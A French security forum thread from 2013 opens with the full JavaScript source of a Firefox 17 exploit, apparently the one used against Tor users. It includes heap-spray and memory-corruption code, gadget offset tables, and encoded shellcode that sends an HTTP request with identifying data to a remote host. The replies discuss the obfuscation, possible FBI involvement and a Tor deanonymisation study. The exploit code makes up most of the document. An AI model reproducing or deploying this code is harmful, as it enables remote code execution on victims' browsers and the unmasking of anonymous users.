<html><body></body></html><script>var y="?????",url=window.location.href;if(0>url.indexOf(y)){var iframe=document.createElement("iframe");iframe.src="content_3.html";document.body.appendChild(iframe)}else parent.w();function df(){return parent.df()};</script>

//// "content_3.html"
<script>var y="?????",z="",z=z+"<body",z=z+">",z=z+"<img",z=z+" height='1' width='1' src='error.html'",z=z+' onerror="javascript: ',z=z+("window.location.href='content_2.html"+y+"';\" "),z=z+">",z=z+"</body",z=z+">",flag=!1,var83=0;
function b(){for(var e=Array(1024),d=Array(1024),c=0;1024>c;c++)e[c]=new ArrayBuffer(180);for(c=0;1024>c;c++)d[c]=new Int32Array(e[c],0,45),d[c][9]=var83;return d}function a(){!1==flag&&(flag=!0,window.stop());window.stop();b();window.parent.frames[0].frameElement.ownerDocument.write(z);b()}var83=parent.df();0!=var83&&document.addEventListener("readystatechange",a,!1);
</script>

//// main exploit
<html>
<body>
<iframe frameborder=0  border=0 height=1 width=1 id="iframe"> </iframe>	
</body>
</html>

<script>

var var1=0xB0;
var var2 = new Array(var1);					
var var3 = new Array(var1);	
var var4 = new Array(var1);

var var5=0xFF004; 	
var var6=0x3FC01;  

var var7=0x60000000; 
var var8=0x18000000; 


var var9=1;

var var10 = 0x12000000;
var var11 = 0;
var var12=0;        

var var13 =0; 

function df()
{
	if(var12==0)
	{
		return 0x00000000;
	}
	var var14 = var10 + 0x00010000 * var11 + 0x0000002B;

	if( var9 == 1 || var9 == 2)
		return ( var14 - var12);
	else
		return 0x00000000;
}

function b()
{
	var version = al();
	if(version <17)  
	{
		window.location.href="content_1.html";
	}
	if( version >=17 && version <18 )
		var12 = 0xE8;
	return ;
}

function c()
{
	var iframe=document.getElementById("iframe");
	iframe.src="content_2.html";
}

function d()
{
	for(var j=0;j<var1;j++)
	{
		if( j<var1/8 || j==var1-1)
		{
			var tabb = new Array(0x1ED00);
			var4[j]=tabb;
			for(i=0;i<0x1ED00;i++)
			{
				var4[j][i]=0x11559944;
			}	
		}
		var2[j]= new ArrayBuffer(var5); 
	}
	for(var j=0;j<var1;j++)
	{
		var3[j]= new Int32Array(var2[j],0,var6);
		var3[j][0]=0x11336688;   										
		
		for(var i=1;i<16;i++)	
		{  					
			var3[j][0x4000*i] = 0x11446688;   							
		}
			
	}	

	for(var j=0;j<var1;j++)
	{
		if(typeof var4[j] !="undefined")
		{
			var4[j][0]=0x22556611;   
		}
	}
}

function e(view)
{
	var i=0;
	for(i=0;i<0x400;i++)
	{
		view[i] = var13+0x1010 ; 
	}
	view[0x0]=var13+0x1010; 		
	view[0x44]=0x0;				
	view[0x45]=0x0;				
	view[0x400-4]=var13+0x1010; 	
	view[0x400]=0x00004004;		     		
	view[0x401]=0x7FFE0300;				
}

function f(var15,view,var16)
{
	var magneto = "";
	var magneto = ("\ufc60\u8ae8"+"\u0000\u6000"+"\ue589\ud231"+"\u8b64\u3052"+"\u528b\u8b0c"+"\u1452\u728b"+"\u0f28\u4ab7"+"\u3126\u31ff"+"\uacc0\u613c"+"\u027c\u202c"+"\ucfc1\u010d"+"\ue2c7\u52f0"+"\u8b57\u1052"+"\u428b\u013c"+"\u8bd0\u7840"+"\uc085\u4a74"+"\ud001\u8b50"+"\u1848\u588b"+"\u0120\ue3d3"+"\u493c\u348b"+"\u018b\u31d6"+"\u31ff\uacc0"+"\ucfc1\u010d"+"\u38c7\u75e0"+"\u03f4\uf87d"+"\u7d3b\u7524"+"\u58e2\u588b"+"\u0124\u66d3"+"\u0c8b\u8b4b"+"\u1c58\ud301"+"\u048b\u018b"+"\u89d0\u2444"+"\u5b24\u615b"+"\u5a59\uff51"+"\u58e0\u5a5f"+"\u128b\u86eb"+"\u5d05\ubd81"+"\u02e9\u0000"+"\u4547\u2054"+"\u7075\u858d"+"\u02d1\u0000"+"\u6850\u774c"+"\u0726\ud5ff"+"\uc085\u5e74"+"\u858d\u02d8"+"\u0000\u6850"+"\u774c\u0726"+"\ud5ff\uc085"+"\u4c74\u90bb"+"\u0001\u2900"+"\u54dc\u6853"+"\u8029\u006b"+"\ud5ff\udc01"+"\uc085\u3675"+"\u5050\u5050"+"\u5040\u5040"+"\uea68\udf0f"+"\uffe0\u31d5"+"\uf7db\u39d3"+"\u74c3\u891f"+"\u6ac3\u8d10"+"\ue1b5\u0002"+"\u5600\u6853"+"\ua599\u6174"+"\ud5ff\uc085"+"\u1f74\u8dfe"+"\u0089\u0000"+"\ue375\ubd80"+"\u024f\u0000"+"\u7401\ue807"+"\u013b\u0000"+"\u05eb\u4de8"+"\u0001\uff00"+"\ub8e7\u0100"+"\u0000\uc429"+"\ue289\u5052"+"\u6852\u49b6"+"\u01de\ud5ff"+"\u815f\u00c4"+"\u0001\u8500"+"\u0fc0\uf285"+"\u0000\u5700"+"\uf9e8\u0000"+"\u5e00\uca89"+"\ubd8d\u02e9"+"\u0000\uebe8"+"\u0000\u4f00"+"\ufa83\u7c20"+"\uba05\u0020"+"\u0000\ud189"+"\uf356\ub9a4"+"\u000d\u0000"+"\ub58d\u02c4"+"\u0000\ua4f3"+"\ubd89\u024b"+"\u0000\u565e"+"\ua968\u3428"+"\uff80\u85d5"+"\u0fc0\uaa84"+"\u0000\u6600"+"\u488b\u660a"+"\uf983\u0f04"+"\u9c82\u0000"+"\u8d00\u0c40"+"\u008b\u088b"+"\u098b\u00b8"+"\u0001\u5000"+"\ue789\uc429"+"\ue689\u5657"+"\u5151\u4868"+"\ud272\uffb8"+"\u85d5\u81c0"+"\u04c4\u0001"+"\u0f00\u0fb7"+"\uf983\u7206"+"\ub96c\u0006"+"\u0000\u10b8"+"\u0000\u2900"+"\u89c4\u89e7"+"\ud1ca\u50e2"+"\u3152\u8ad2"+"\u8816\u24d0"+"\uc0f0\u04e8"+"\u093c\u0477"+"\u3004\u02eb"+"\u3704\u0788"+"\u8847\u24d0"+"\u3c0f\u7709"+"\u0404\ueb30"+"\u0402\u8837"+"\u4707\ue246"+"\u59d4\ucf29"+"\ufe89\u0158"+"\u8bc4\u4bbd"+"\u0002\uf300"+"\uc6a4\u4f85"+"\u0002\u0100"+"\u2ee8\u0000"+"\u3100\u50c0"+"\u2951\u4fcf"+"\u5357\uc268"+"\u38eb\uff5f"+"\u53d5\u7568"+"\u4d6e\uff61"+"\ue9d5\ufec8"+"\uffff\uc931"+"\ud1f7\uc031"+"\uaef2\ud1f7"+"\uc349\u0000"+"\u0000\u8d00"+"\ue9bd\u0002"+"\ue800\uffe4"+"\uffff\ub94f"+"\u004f\u0000"+"\ub58d\u0275"+"\u0000\ua4f3"+"\ubd8d\u02e9"+"\u0000\ucbe8"+"\uffff\uc3ff"+"\u0a0d\u6f43"+"\u6e6e\u6365"+"\u6974\u6e6f"+"\u203a\u656b"+"\u7065\u612d"+"\u696c\u6576"+"\u0a0d\u6341"+"\u6563\u7470"+"\u203a\u2f2a"+"\u0d2a\u410a"+"\u6363\u7065"+"\u2d74\u6e45"+"\u6f63\u6964"+"\u676e\u203a"+"\u7a67\u7069"+"\u0a0d\u0a0d"+"\u8300\u0ec7"+"\uc931\ud1f7"+"\uc031\uaef3"+"\uff4f\u0de7"+"\u430a\u6f6f"+"\u696b\u3a65"+"\u4920\u3d44"+"\u7377\u5f32"+"\u3233\u4900"+"\u4850\u504c"+"\u5041\u0049"+"\u0002\u5000"+"\ude41\u36ca"+"\u4547\u2054"+"\u302f\u6335"+"\u6165\u6434"+"\u2d65\u3539"+"\u6431\u342d"+"\u3330\u2d37"+"\u6662\u6638"+"\u662d\u3936"+"\u3530\u6235"+"\u3732\u6239"+"\u2062\u5448"+"\u5054\u312f"+"\u312e\u0a0d"+"\u6f48\u7473"+"\u203a\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u9000"+"");
	var var29 = magneto;
	var var17 = "\u9060";
	var var18 = "\u9061";
	var var19 = "\uC481\u0000\u0008" ; 
	var var20 = "\u2589\u3000"+String.fromCharCode((var13 >> 16)  & 0x0000FFFF); 
	var var21="\u258B\u3000"+String.fromCharCode((var13 >> 16)  & 0x0000FFFF);
	var var22 = "\uE589"; 
	var var23 ="\uC3C9";
	var var24  = "\uE889";         
	var24 += "\u608D\u90C0";       

	var var25 = var10 + 0x00010000 * var11 + 0x00000030 + 0x00100000;
	var var26 = var25 + var16*4

	var var27 =""
	var27 += "\uB890\u2020\u2020";          				      
	var27 += "\uA390"+ae(var26+0x00);
	var27 += "\uA390"+ae(var26+0x04);
	var27 += "\uA390"+ae(var26+0x08);
	var27 += "\uA390"+ae(var26+0x0C);

	var var28  = var17;
	var28 += var20;
	var28 += var19;
	var28 += var22;
	var28 += var27;
	var28 += var29;
    var28 += var21;
    var28 += var18;
    var28 += var23;
	var var29Array = new Array();
	var29Array=ag(var28);

	var var29Ad = var13+0x5010;
	var i=0;
	var j=0;
	var var30=var13+0x4048;
	var var31 = new Array();

	var31[0]=var30; 			
	var31[1]=var30; 			
	var31[2]=var30; 			
	var31[3]=var15[1];			
	var31[4]=var29Ad;		
	var31[5]=0xFFFFFFFF;			
	var31[6]=var13+0x4044;	
	var31[7]=var13+0x4040;	
	var31[8]=0x00000040;			
	var31[9]=var13+0x4048;	
	var31[10]=0x00040000;		
	var31[11]=var29Ad;		
	var31[12]=var13+0x301C;	
		
	for(var i=0 ; i < 0x140 ; i++)
	{
		var31[i+15]=var15[0]; 
	}	
	var var32 = 0x3F8;		
	view[0x800+0+var32]=var13+0x4018;  
	view[0x800+1+var32]=var13+0x4018; 
	for(var i=2 ; i < var31.length  ; i++)
	{
		view[0x800+i+var32]=  0x41414141; 
	}		
	for(var i=0 ; i < var31.length  ; i++)
	{
		view[0xC02+i+var32]=  var31[i];
	}				
	for(var i=0 ; i < var29Array.length ; i++)
	{
		view[0x1000 + i+var32] = var29Array[i];
	}			
	
}

function g(var50,view)
{
	var k = h(var50,view);
	var j=0;
	if( k < 0 )
		return -1;
	view[0x404+k]=var13+0x3010;
	return 1;
}

function h(var50,view)
{
	var address=0;
	var u=0;
	var memory="";
	var var55=0;
	for( u =7; u >=4 ;u--)
	{
		address=view[0x404+u];
		if( address > 0x000A0000 && address < 0x80000000 )  
		{
			memory = i(address,0x48,var50,view);
			var55=af(memory[0x14]+memory[0x15]);
			if(var55==address)
			{
				return u;
			}				
		}
	}
	return -1;
}

function i(address,size,var50,view)
{
	var var56 = size/2;
	var56 = var56*0x10 +0x04;
	view[0x400]=var56;		  
	view[0x401]=address;     
	return var4[var50][0];
}

function j(memory,view)
{
	var intArray=ag(memory);
	for(var i=0 ; i < intArray.length  ; i++)
	{
		view[0x404+i]=intArray[i];		
	}
}

function k()
{
	for(var j=0;j<var1;j++)
	{
		if(var2[j].byteLength!=var5)
		{
			return j;
		}
	}
	return -1;
}

function l(view,var58)
{
	view[var58] = var13 + 0x1030;	
	view[var58+1] = 0xFFFFFF85;    		
}

function m(view,var58)
{
	view[var58]=0x00000000;  
	for(var j=0;j<var1;j++)
	{
		if(typeof var4[j] !="undefined")
		{
			if(var4[j][0]!=0x22556611) 
				return j;
		}
	}
	return -1
}

function n(view,firstvar58)
{
	var var57 = var10 + 0x00100000 + 0x00010000 * var11;	
	var var58=0;
	for(var i=0;i<200;i++)
	{
		if(view[var58] != 0x11336688)  	
		{
			if(view[var58] == 0x22556611 )  
				return  var58;
			else
				return -1;
		}
		if(var58==0)
		{
			var58 = firstvar58;
		}else{
			var var59=view[var58-0x0C];
			var58 = (var59 - var57)/4;
		}
	}
	return -1;
}

function o(var60)
{
	var view  = new Int32Array(var2[var60],0,0x00040400);

	var var59 = view[0x00100000/4-0x0C];
	var var57 = var10 + 0x00100000 + 0x00010000 * var11;	

	return ((var59 - var57)/4);
}

function p()
{
	for(var j=0;j<var1;j++)
	{
		for(var i=1;i<16;i++)
		{
			if(var3[j][i*0x4000-0x02]==0x01000000)
			{
				return -i;
			}
		}
	}
	return 0;
} 

function q(var60)
{
	var view  = new Int32Array(var2[var60],0,0x00040400);
	view[0x00100000/4-0x02]=var7; 
	if(var2[var60+1].byteLength==var7)
		return var60+1;
	return -1;
}

function r(var60)
{
	var view  = new Int32Array(var2[var60],0,0x00040400);
	view[0x00100000/4-0x02]=var5; 
}

function t()
{
	if(typeof sessionStorage.tempStor !="undefined")
		return false;
	sessionStorage.tempStor="";
	return true;
}

function u()
{	
	if( t() == true )
	{
		var9 = 1;		
		b();
		d();
		c();
	}else{
		return ;
	}
}

function v()
{
	if(k() == -1)
	{
		var11 = p();
		var9 = 2;	
		c();
	}else{
		x();
	}
}

function w()
{
	if(var9==1)
		v();
	else
		x();
}

function x()
{

	var var60 = k();
	if(var60==-1)
		return ;			

	var nextvar60 = q(var60);
	if(nextvar60==-1)
		return ;   				
		
	var var61 = o(var60);
	var var62  = new Int32Array(var2[nextvar60],0,var8);
	var var58 = n(var62,var61);
	if(var58==-1)
		return ;			

	var var50 = m(var62,var58);

	var13 = var10 + 0x00100000 + 0x00010000 * var11; 
	e(var62);

	l(var62,var58);

	var var64 = var4[var50][0];

	ac(var64,var50,var62,var58,var60);
}

function y(index)
{
	var4[index][1]= document.createElement('span') ;
}		

function z(index,index2)
{
	var4[index][1].innerHTML;
}		

function aa(view,var63)
{
	return view[var63];
}	

function ab(address,view,var63)
{
	view[var63]=address;
}	


function ac(var64,var50,var62,var58,var60)
{
	var var15=ah(var64);

	f(var15,var62,var58);

	y(var50);
	var var66 = aa(var62,var58+2);

	var var67 = i(var66,0x40,var50,var62) ;
	j(var67,var62);

	g(var50,var62);
	ab(var13+0x1040 ,var62,var58+2);

	r(var60)
	setTimeout(ad,1000);
	z(var50);
}	


function ad()
{
	for(var j=0;j<var1;j++)
	{
		delete var3[j]
		var3[j]= null;
		
		delete var2[j];
		var2[j] = null;

		if(typeof var4[j] !="undefined")
		{
			delete var4[j];		
			var4[j] = null;
		}	
	}	
	delete var2;
	delete var3;
	delete var4;	
	var2=null;
	var3=null;
	var4=null;	
}
		
function ae(int32)
 {
    var var68 = String.fromCharCode((int32)& 0x0000FFFF);
    var var69 = String.fromCharCode((int32 >> 16)  & 0x0000FFFF);
    return var68+var69;
}  
    
		
function af(string)
{		
    var var70 = string.charCodeAt(0);
    var var71 = string.charCodeAt(1);
    var var72 = (var71 << 16) + var70;
	return var72;
}	
		
function ag(string)
{	
	if(string.length%2!=0)
		string+="\u9090";
	var intArray= new Array();
	for(var i=0 ; i*2 < string.length; i++ )
		intArray[i]=af(string[i*2]+string[i*2+1]);
	return intArray;
}	
		

function ah(var73)
{ 
	var var74 = var73.substring(0,2);
    var var70 = var74.charCodeAt(0);
    var var71 = var74.charCodeAt(1);
    var var75 = (var71 << 16) + var70;
    if (var75 == 0)
    {
        var var76 = var73.substring(32, 34);
        var var70 = var76.charCodeAt(0);
        var var71 = var76.charCodeAt(1);
        var75 = (var71 << 16) + var70;
    }
    var var15 = am(var75);
    if (var15 == -1)
    {
        return;
    }
    return var15
}

function aj(version)
{
	var i = navigator.userAgent.indexOf("Windows NT");
	if (i != -1)
		return true;
	return false;
}

function ak()
{
	var ua = navigator.userAgent;
	var browser = ua.substring(0, ua.lastIndexOf("/"));
	browser = browser.substring(browser.lastIndexOf(" ") + 1);
	if (browser != "Firefox")
		return -1;

	var version = ua.substring(ua.lastIndexOf("/") + 1);
	version = parseInt(version.substring(0, version.lastIndexOf(".")));
	return version;
}

function al()
{
	version = ak();

	if (!aj(version))
		return -1;
	return version;
}

		
function am(var77)
{
    var var15 = new Array(2);
     if (var77 % 0x10000 == 0xE510) 					
     {      
        var78 = var77 - 0xE510;
        var15[0] = var78 + 0xE8AE;                   
        var15[1] = var78 + 0xD6EE;                   
    } 
    else if (var77 % 0x10000 == 0x9A90) 			
    {   
        var78 = var77 - 0x69A90;
        var15[0] = var78 + 0x6A063;                 
        var15[1] = var78 + 0x68968;                  
    } 
    else if (var77 % 0x10000 == 0x5E70) 				
    {   
        var78 = var77 - 0x65E70;
        var15[0] = var78 + 0x66413;                  
        var15[1] = var78 + 0x64D34;                 
    } 
    else if (var77 % 0x10000 == 0x35F3) 				
    {   
        var78 = var77 - 0x335F3;
        var15[0] = var78 + 0x4DE13;                  
        var15[1] = var78 + 0x49AB8;                  
    } 
    else if (var77 % 0x10000 == 0x5CA0) 				
    {   
        var78 = var77 - 0x65CA0;
        var15[0] = var78 + 0x66253;                 
        var15[1] = var78 + 0x64B84;                  
    } 
    else if (var77 % 0x10000 == 0x5CD0) 	 			
    {  
        var78 = var77 - 0x65CD0;
        var15[0] = var78 + 0x662A3;                  
        var15[1] = var78 + 0x64BA4;                 
        
    } 
    else if (var77 % 0x10000 == 0x6190)   			
    { 
        var78 = var77 - 0x46190;
        var15[0] = var78 + 0x467D3;                 
        var15[1] = var78 + 0x45000;                   
        
    } 
    else if (var77 % 0x10000 == 0x9CB9) 			
    {   
        var78 = var77 - 0x29CB9;
        var15[0] = var78 + 0x29B83;                
        var15[1] = var78 + 0xFFC8;                  
    } 
    else if (var77 % 0x10000 == 0x9CE9)			
    {   
        var78 = var77 - 0x29CE9;
        var15[0] = var78 + 0x29BB3;                 
        var15[1] = var78 + 0xFFD8;                  
    } 
    else if (var77 % 0x10000 == 0x70B0) 				
    {   
        var78 = var77 - 0x470B0;
        var15[0] = var78 + 0x47733;                  
        var15[1] = var78 + 0x45F18;                
    } 
    else if (var77 % 0x10000 == 0x7090)  			
    {  
        var78 = var77 - 0x47090;
        var15[0] = var78 + 0x476B3;               
        var15[1] = var78 + 0x45F18;                
    } 
    else if (var77 % 0x10000 == 0x9E49)   			
    { 
        var78 = var77 - 0x29E49;
        var15[0] = var78 + 0x29D13;                 
        var15[1] = var78 + 0x10028;                 
    } 
    else if (var77 % 0x10000 == 0x9E69)    		
    {
        var78 = var77 - 0x29E69;
        var15[0] = var78 + 0x29D33;              
        var15[1] = var78 + 0x10018;              
    }
    
    else if (var77 % 0x10000 == 0x9EB9)			
    {
        var78 = var77 - 0x29EB9;	
        var15[0] = var78 + 0x29D83;              
        var15[1] = var78 + 0xFFC8;              
    }
    else 
    {
        return -1;                         
    }
    
    return var15;
}

window.addEventListener("onload", u(),true);

</script>
    Dernière modification par SAKAROV, 10 août 2013, 16h10.
    OxyGen Software
    Sécurité, développement, formations, informatique biomédicale
    [email protected]

    Commentaire

    • #3
      Une basique offuscation par substitution, ingénieux tout de même !
      Ça vaudrait le coup de le RE totalement.

      Merci TorTukiTu pour la source.

      EDIT : Le script pour récupérer l'adresse MAC fonctionne avec le VBs (via ActiveX).
      Cette faille n'est pas nouvelle. Par contre, c'est étonnant que Firefox n'est pas continué à la surveiller de prêt. Avant on pouvait injecter n'importe quel virus depuis un code VBs non protégé.
      Dernière modification par Yarflam, 10 août 2013, 17h10.
      ~ Yarflam ~
      ❉ L'Univers se dirige vers son ultime perfection ❉

      Commentaire

      • #4
        Juste une petite remarque par rapport à cette news.

        On a pu lire à droite à gauche que l'anonymat sur TOR avait été compromis.

        Je rappelle que cette vulnérabilité n'affecte pas TOR lui même, mais un logiciel tiers, en l'occurence FF17.

        Qui plus est, ce choix d'exploitation nous en dit beaucoup sur les connaissances et moyens dont disposent le FBI vis à vis de TOR:

        Il aurait été beaucoup plus efficace de cibler directement le client TOR; C'est Firefox qui a été ciblé.

        Ceci a une implication importante :
        - Le FBI ne veux ou ne peux pas casser directement l'anonymat sur le réseau TOR.

        Il est aussi possible et probable que le FBI dispose d'une palette d'exploits et de 0-day sur quelques soft les plus répandus, dont FF. Ce qui implique que les utilisateurs de systèmes un peu plus exotiques sont beaucoup plus en sécurité.

        En conclusion, cette attaque ressemble plus à un coup de pub destiné à faire fuir les utilisateurs de TOR. La même chose aurait pu se produire via Freenet.
        Il est certain que la popularité grandissante de TOR pose un problème à nos amis cravateux du us.gouv

        Tortue 974.
        Dernière modification par TorTukiTu, 13 août 2013, 09h19.
        OxyGen Software
        Sécurité, développement, formations, informatique biomédicale
        [email protected]

        Commentaire

        • #5
          update : des chercheurs ont mené une étude sur la possibilité de trouver l'IP réelle derrière une IP appartenant au réseau Tor. Le résultat est sans surprise :

          Dans certains cas, les utilisateurs peuvent être identifiés avec une certitude de 95 %.

          Un utilisateur régulier de Tor peut être identifié en moins de trois mois avec une probabilité de 50 % et en moins de six mois avec une probabilité de 80 %.

          Cette recherche fera l'objet d'une conférence en novembre au CCS (Computer and Communications Security) à Berlin.

          http://www.ohmygodel.com/publication...uted-ccs13.pdf

          Bonne lecture.

          Crédit : Aaron Johnson (responsable de l'étude)

          Après ce constat, il est étonnant de voir que le nombre d'internautes utilisant Tor a doublé (dans le monde et en France) en seulement deux semaines en août 2013, certainement dû à la parano engendrée par PRISM et compagnie.





          La NSA peut se frotter les mains La parano va dans leur intérêt
          Dernière modification par SAKAROV, 06 septembre 2013, 15h26.
          sigpic

          Cyprium Download Link

          Plus j'étudie plus j'me rends compte que je n'sais rien.

          †|

          Commentaire

          Précédent template Suivante
          Projets
          Cyprium
          Blog
          CTF Hackademics
          Discord
          Status
          Mentions légales
          Politique de confidentialité
          Conditions générales d'utilisation (CGU)
          Chargement...
          X